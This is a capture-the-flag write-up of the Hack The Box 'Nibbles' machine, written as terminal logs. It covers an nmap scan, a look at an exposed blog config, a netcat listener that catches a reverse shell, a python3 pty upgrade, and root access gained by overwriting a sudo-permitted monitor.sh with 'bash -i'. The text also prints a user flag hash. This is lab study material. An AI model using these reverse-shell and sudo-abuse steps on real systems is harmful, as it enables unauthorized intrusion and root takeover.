nibbles
Introduction:
Recon
eneloop@kinetic:…/hackthebox/nibbles/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.nibbles.txt 10.10.10.75 [sudo] password for eneloop: Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 14:58 EST Nmap scan report for 10.10.10.75 Host is up (0.014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn’t have a title (text/html). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=36913%PV=Y%DS=2%DC=I%G=Y%TM=60282F6 OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1 OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds
Enumeration
http://nibbles.htb/nibbleblog/content/private/config.xml
1<notification_session_fail type="integer">0</notification_session_fail>
2<notification_session_start type="integer">0</notification_session_start>
3<notification_email_to type="string">[email protected]</notification_email_to>
4<notification_email_from type="string">[email protected]</notification_email_from>
5<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
6
http://nibbles.htb/nibbleblog/content/public/upload/
Exploitation
Post-exploit/PrivEsc
eneloop@kinetic:…/tools/reverse-shell/php$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.75] 39336 Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 19:21:40 up 4:15, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) /bin/sh: 0: can’t access tty; job control turned off $ pwd / $ python -c ‘import pty;pty.spawn("/bin/bash")’ /bin/sh: 5: python: not found $ python3 -c ‘import pty;pty.spawn("/bin/bash")’
nibbler@Nibbles:/$ sudo -l sudo -l
Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh nibbler@Nibbles:/$
nibbler@Nibbles:/home$ cd /home/nibbler
cd /home/nibbler
nibbler@Nibbles:/home/nibbler$ ls -all
ls -all
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw——- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r——– 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r——– 1 nibbler nibbler 33 Feb 13 15:06 user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
5f60afdab7ea02eae737a1246e540ef0
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
ls
stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -all
ls -all
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
1
2 ####################################################################################################
3 # Tecmint_monitor.sh #
4 # Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/ #
5 # If any bug, report us in the link below #
6 # Free to use/edit/distribute the code below by #
7 # giving proper credit to Tecmint.com and Author #
8 # #
9 ####################################################################################################
10#! /bin/bash
11# unset any variable which system may be using
12
13# clear the screen
14clear
15
16unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
17
18while getopts iv name
19do
20 case $name in
21 i)iopt=1;;
22 v)vopt=1;;
23 *)echo "Invalid arg";;
24 esac
25done
26
27if [[ ! -z $iopt ]]
28then
29{
30wd=$(pwd)
31basename "$(test -L "$0" && readlink "$0" || echo "$0")" > /tmp/scriptname
32scriptname=$(echo -e -n $wd/ && cat /tmp/scriptname)
33su -c "cp $scriptname /usr/bin/monitor" root && echo "Congratulations! Script Installed, now run monitor Command" || echo "Installation failed"
34}
35fi
36
37if [[ ! -z $vopt ]]
38then
39{
40echo -e "tecmint_monitor version 0.1\nDesigned by Tecmint.com\nReleased Under Apache 2.0 License"
41}
42fi
43
44if [[ $# -eq 0 ]]
45then
46{
47
48
49# Define Variable tecreset
50tecreset=$(tput sgr0)
51
52# Check if connected to Internet or not
53ping -c 1 google.com &> /dev/null && echo -e '\E[32m'"Internet: $tecreset Connected" || echo -e '\E[32m'"Internet: $tecreset Disconnected"
54
55# Check OS Type
56os=$(uname -o)
57echo -e '\E[32m'"Operating System Type :" $tecreset $os
58
59# Check OS Release Version and Name
60cat /etc/os-release | grep 'NAME\|VERSION' | grep -v 'VERSION_ID' | grep -v 'PRETTY_NAME' > /tmp/osrelease
61echo -n -e '\E[32m'"OS Name :" $tecreset && cat /tmp/osrelease | grep -v "VERSION" | cut -f2 -d\"
62echo -n -e '\E[32m'"OS Version :" $tecreset && cat /tmp/osrelease | grep -v "NAME" | cut -f2 -d\"
63
64# Check Architecture
65architecture=$(uname -m)
66echo -e '\E[32m'"Architecture :" $tecreset $architecture
67
68# Check Kernel Release
69kernelrelease=$(uname -r)
70echo -e '\E[32m'"Kernel Release :" $tecreset $kernelrelease
71
72# Check hostname
73echo -e '\E[32m'"Hostname :" $tecreset $HOSTNAME
74
75# Check Internal IP
76internalip=$(hostname -I)
77echo -e '\E[32m'"Internal IP :" $tecreset $internalip
78
79# Check External IP
80externalip=$(curl -s ipecho.net/plain;echo)
81echo -e '\E[32m'"External IP : $tecreset "$externalip
82
83# Check DNS
84nameservers=$(cat /etc/resolv.conf | sed '1 d' | awk '{print $2}')
85echo -e '\E[32m'"Name Servers :" $tecreset $nameservers
86
87# Check Logged In Users
88who>/tmp/who
89echo -e '\E[32m'"Logged In users :" $tecreset && cat /tmp/who
90
91# Check RAM and SWAP Usages
92free -h | grep -v + > /tmp/ramcache
93echo -e '\E[32m'"Ram Usages :" $tecreset
94cat /tmp/ramcache | grep -v "Swap"
95echo -e '\E[32m'"Swap Usages :" $tecreset
96cat /tmp/ramcache | grep -v "Mem"
97
98# Check Disk Usages
99df -h| grep 'Filesystem\|/dev/sda*' > /tmp/diskusage
100echo -e '\E[32m'"Disk Usages :" $tecreset
101cat /tmp/diskusage
102
103# Check Load Average
104loadaverage=$(top -n 1 -b | grep "load average:" | awk '{print $10 $11 $12}')
105echo -e '\E[32m'"Load Average :" $tecreset $loadaverage
106
107# Check System Uptime
108tecuptime=$(uptime | awk '{print $3,$4}' | cut -f1 -d,)
109echo -e '\E[32m'"System Uptime Days/(HH:MM) :" $tecreset $tecuptime
110
111# Unset Variables
112unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
113
114# Remove Temporary Files
115rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
116}
117fi
118shift $(($OPTIND -1))
nibbler@Nibbles:/home/nibbler/personal/stuff$ mv monitor.sh monitorbackup.sh mv monitor.sh monitorbackup.sh nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l ls -l total 4 -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitorbackup.sh nibbler@Nibbles:/home/nibbler/personal/stuff$
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo “bash -i” > monitor.sh
echo “bash -i” > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
whoami
root@Nibbles:/home/nibbler/personal/stuff# whoami root root@Nibbles:/home/nibbler/personal/stuff# ls monitor.sh monitorbackup.sh root@Nibbles:/home/nibbler/personal/stuff# ls -l total 8 -rwxr-xr-x 1 nibbler nibbler 8 Feb 13 19:32 monitor.sh -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitorbackup.sh root@Nibbles:/home/nibbler/personal/stuff# pwd /home/nibbler/personal/stuff root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# root@Nibbles:/home/nibbler/personal/stuff# cd /root cd /root root@Nibbles:~# ls ls root.txt root@Nibbles:~# cat root.txt cat root.txt
Notes: